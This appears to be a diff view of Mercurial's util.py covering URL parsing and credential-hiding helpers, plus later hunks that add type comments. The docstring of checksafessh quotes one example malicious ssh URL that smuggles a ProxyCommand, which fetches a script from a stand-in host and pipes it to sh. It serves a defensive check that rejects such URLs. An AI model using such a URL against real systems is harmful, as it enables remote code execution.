  3218             # we store the query in escaped form.
       
  3219             s += b'?' + self.query
       
  3220         if self.fragment is not None:
       
  3221             s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
       
  3222         return s
       
  3223 
       
  3224     __str__ = encoding.strmethod(__bytes__)
       
  3225 
       
  3226     def authinfo(self):
       
  3227         user, passwd = self.user, self.passwd
       
  3228         try:
       
  3229             self.user, self.passwd = None, None
       
  3230             s = bytes(self)
       
  3231         finally:
       
  3232             self.user, self.passwd = user, passwd
       
  3233         if not self.user:
       
  3234             return (s, None)
       
  3235         # authinfo[1] is passed to urllib2 password manager, and its
       
  3236         # URIs must not contain credentials. The host is passed in the
       
  3237         # URIs list because Python < 2.4.3 uses only that to search for
       
  3238         # a password.
       
  3239         return (s, (None, (s, self.host), self.user, self.passwd or b''))
       
  3240 
       
  3241     def isabs(self):
       
  3242         if self.scheme and self.scheme != b'file':
       
  3243             return True  # remote URL
       
  3244         if hasdriveletter(self.path):
       
  3245             return True  # absolute for our purposes - can't be joined()
       
  3246         if self.path.startswith(br'\\'):
       
  3247             return True  # Windows UNC path
       
  3248         if self.path.startswith(b'/'):
       
  3249             return True  # POSIX-style
       
  3250         return False
       
  3251 
       
  3252     def localpath(self):
       
  3253         if self.scheme == b'file' or self.scheme == b'bundle':
       
  3254             path = self.path or b'/'
       
  3255             # For Windows, we need to promote hosts containing drive
       
  3256             # letters to paths with drive letters.
       
  3257             if hasdriveletter(self._hostport):
       
  3258                 path = self._hostport + b'/' + self.path
       
  3259             elif (
       
  3260                 self.host is not None and self.path and not hasdriveletter(path)
       
  3261             ):
       
  3262                 path = b'/' + path
       
  3263             return path
       
  3264         return self._origpath
       
  3265 
       
  3266     def islocal(self):
       
  3267         '''whether localpath will return something that posixfile can open'''
       
  3268         return (
       
  3269             not self.scheme
       
  3270             or self.scheme == b'file'
       
  3271             or self.scheme == b'bundle'
       
  3272         )
       
  3273 
       
  3274 
       
  3275 def hasscheme(path):
       
  3276     return bool(url(path).scheme)
       
  3277 
       
  3278 
       
  3279 def hasdriveletter(path):
       
  3280     return path and path[1:2] == b':' and path[0:1].isalpha()
       
  3281 
       
  3282 
       
  3283 def urllocalpath(path):
       
  3284     return url(path, parsequery=False, parsefragment=False).localpath()
       
  3285 
       
  3286 
       
  3287 def checksafessh(path):
       
  3288     """check if a path / url is a potentially unsafe ssh exploit (SEC)
       
  3289 
       
  3290     This is a sanity check for ssh urls. ssh will parse the first item as
       
  3291     an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
       
  3292     Let's prevent these potentially exploited urls entirely and warn the
       
  3293     user.
       
  3294 
       
  3295     Raises an error.Abort when the url is unsafe.
       
  3296     """
       
  3297     path = urlreq.unquote(path)
       
  3298     if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
       
  3299         raise error.Abort(
       
  3300             _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
       
  3301         )
       
  3302 
       
  3303 
       
  3304 def hidepassword(u):
       
  3305     '''hide user credential in a url string'''
       
  3306     u = url(u)
       
  3307     if u.passwd:
       
  3308         u.passwd = b'***'
       
  3309     return bytes(u)
       
  3310 
       
  3311 
       
  3312 def removeauth(u):
       
  3313     '''remove all authentication information from a url string'''
       
  3314     u = url(u)
       
  3315     u.user = u.passwd = None
       
  3316     return bytes(u)
       
  3317 
  3008 
  3318 
  3009 
  3319 timecount = unitcountfn(
  3010 timecount = unitcountfn(
  3320     (1, 1e3, _(b'%.0f s')),
  3011     (1, 1e3, _(b'%.0f s')),
  3321     (100, 1, _(b'%.1f s')),
  3012     (100, 1, _(b'%.1f s')),
  3413     (b'b', 1),
  3104     (b'b', 1),
  3414 )
  3105 )
  3415 
  3106 
  3416 
  3107 
  3417 def sizetoint(s):
  3108 def sizetoint(s):
       
  3109     # type: (bytes) -> int
  3418     """Convert a space specifier to a byte count.
  3110     """Convert a space specifier to a byte count.
  3419 
  3111 
  3420     >>> sizetoint(b'30')
  3112     >>> sizetoint(b'30')
  3421     30
  3113     30
  3422     >>> sizetoint(b'2.2kb')
  3114     >>> sizetoint(b'2.2kb')
  3638     else:
  3330     else:
  3639         yield
  3331         yield
  3640 
  3332 
  3641 
  3333 
  3642 def _estimatememory():
  3334 def _estimatememory():
       
  3335     # type: () -> Optional[int]
  3643     """Provide an estimate for the available system memory in Bytes.
  3336     """Provide an estimate for the available system memory in Bytes.
  3644 
  3337 
  3645     If no estimate can be provided on the platform, returns None.
  3338     If no estimate can be provided on the platform, returns None.
  3646     """
  3339     """
  3647     if pycompat.sysplatform.startswith(b'win'):
  3340     if pycompat.sysplatform.startswith(b'win'):
  3648         # On Windows, use the GlobalMemoryStatusEx kernel function directly.
  3341         # On Windows, use the GlobalMemoryStatusEx kernel function directly.
  3649         from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
  3342         from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
  3650         from ctypes.wintypes import Structure, byref, sizeof, windll
  3343         from ctypes.wintypes import (  # pytype: disable=import-error
       
  3344             Structure,
       
  3345             byref,
       
  3346             sizeof,
       
  3347             windll,
       
  3348         )
  3651 
  3349 
  3652         class MEMORYSTATUSEX(Structure):
  3350         class MEMORYSTATUSEX(Structure):
  3653             _fields_ = [
  3351             _fields_ = [
  3654                 ('dwLength', DWORD),
  3352                 ('dwLength', DWORD),
  3655                 ('dwMemoryLoad', DWORD),
  3353                 ('dwMemoryLoad', DWORD),